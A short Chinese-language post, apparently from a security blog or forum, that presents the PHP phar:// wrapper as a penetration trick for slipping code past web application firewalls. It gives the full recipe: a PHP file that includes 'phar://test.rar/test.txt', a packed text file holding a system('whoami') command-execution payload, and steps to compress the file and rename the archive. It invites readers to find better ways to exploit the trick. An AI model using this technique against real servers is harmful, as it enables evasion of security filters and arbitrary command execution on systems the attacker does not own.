可能有人已经早已经知道了,不过我也是一次在研究phar扩展的溢出漏洞时发现的一个技巧,就是利用phar:协议,这个协议可能在渗透过程中会帮你绕过一些东西。
我能够想到的是有些waf不会防php后缀的文件,但是他会检测里面的内容,我们可以通过包含的方式,包含rar后缀或者phar后缀里面的txt文件或者jpg文件达到绕过防护的目的,具体我也时间细细的把玩。你们可以自己想想,怎样利用才是最好的。
test.php代码内容:
<?php
include 'phar://test.rar/test.txt';
?>
test.txt里的内容:
<?php
echo system('whoami');
?>
然后将test.txt进行压缩,然后可以将压缩包的后缀改为zip.phar.rar等格式。这里我改为test.rar